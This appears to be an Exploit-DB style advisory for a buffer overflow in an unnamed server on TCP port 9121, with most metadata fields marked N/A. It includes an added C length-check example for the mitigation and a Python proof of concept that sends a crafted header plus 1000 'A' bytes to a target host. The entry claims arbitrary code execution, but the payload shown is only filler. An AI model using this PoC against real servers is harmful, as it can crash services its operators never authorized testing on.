Vendor: N/A
By: Anonymous
CVSS: 9.3 (HIGH)
Buffer Overflow
CWE: 120
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2020

Buffer Overflow in Server

This exploit targets a buffer overflow vulnerability in a server listening on TCP port 9121. It sends a crafted packet carrying a malicious payload of 1000 bytes to the server, which causes a buffer overflow and allows the attacker to execute arbitrary code on the server.

Mitigation:

The server should be configured to limit the size of the payloads it accepts, and should be regularly patched and updated.
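
An added example, not code from the original entry or from the affected product: a C length check of the kind the mitigation describes, applied to a header shaped like the one the PoC sends (six little-endian 32-bit words, with lengths in the fourth and fifth). The 512-byte limit, the function names, and the choice of the first length word as the copy size are assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN     24u   /* six 32-bit words, matching the PoC header layout */
#define MAX_PAYLOAD 512u  /* assumed capacity of the receive buffer */

enum { PKT_OK = 0, PKT_SHORT = -1, PKT_BAD_LEN = -2, PKT_TOO_BIG = -3 };

static uint32_t rd_le32(const uint8_t *p) {
    return p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}
static void wr_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/* Validate both declared lengths before any byte is copied into `out`. */
int parse_packet(const uint8_t *pkt, size_t pkt_len,
                 uint8_t *out, size_t out_cap, size_t *out_len) {
    if (pkt_len < HDR_LEN) return PKT_SHORT;
    uint32_t len_a = rd_le32(pkt + 12);  /* first length word */
    uint32_t len_b = rd_le32(pkt + 16);  /* second length word */
    size_t body = pkt_len - HDR_LEN;     /* payload bytes actually received */
    if (len_a > body || len_b > body) return PKT_BAD_LEN;
    if (len_a > MAX_PAYLOAD || len_b > MAX_PAYLOAD || len_a > out_cap) return PKT_TOO_BIG;
    memcpy(out, pkt + HDR_LEN, len_a);   /* assumption: len_a is the copy size */
    *out_len = len_a;
    return PKT_OK;
}

/* Constructed test input: header words other than the lengths are zeroed. */
size_t build_packet(uint8_t *buf, uint32_t declared, size_t actual) {
    memset(buf, 0, HDR_LEN);
    wr_le32(buf + 12, declared); wr_le32(buf + 16, declared);
    memset(buf + HDR_LEN, 0x41, actual);
    return HDR_LEN + actual;
}

int main(void) {
    uint8_t pkt[HDR_LEN + 1000], out[MAX_PAYLOAD]; size_t n = 0;
    size_t len = build_packet(pkt, 1000, 1000);  /* same payload size as the PoC */
    printf("1000-byte payload -> %d\n", parse_packet(pkt, len, out, sizeof out, &n));
    len = build_packet(pkt, 100, 100);
    printf("100-byte payload  -> %d\n", parse_packet(pkt, len, out, sizeof out, &n));
    return 0;
}
```
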
Source

Exploit-DB raw data:

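#!/usr/bin/env python3
# Proof of concept: sends a 24-byte header followed by 1000 bytes of 0x41
# to TCP port 9121 on the host given as the first argument.
import socket
import sys
from struct import pack

if len(sys.argv) != 2:
    print("Usage: %s <server>" % sys.argv[0])
    sys.exit(1)

try:
    server = sys.argv[1]
    port = 9121
    size = 1000

    # Payload: 1000 bytes of "A"
    inputBuffer = b"\x41" * size

    # Header: three fixed 32-bit words, then the payload length twice,
    # then the last payload byte (0x41) as a 32-bit little-endian value
    header = b"\x75\x19\xba\xab"
    header += b"\x03\x00\x00\x00"
    header += b"\x00\x40\x00\x00"
    header += pack('<I', len(inputBuffer))
    header += pack('<I', len(inputBuffer))
    header += pack('<I', inputBuffer[-1])

    buf = header + inputBuffer

    print("Sending evil buffer...")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((server, port))
    s.sendall(buf)  # sendall() keeps sending until the whole buffer is written
    s.close()

    print("Done!")

except socket.error:
    print("Could not connect!")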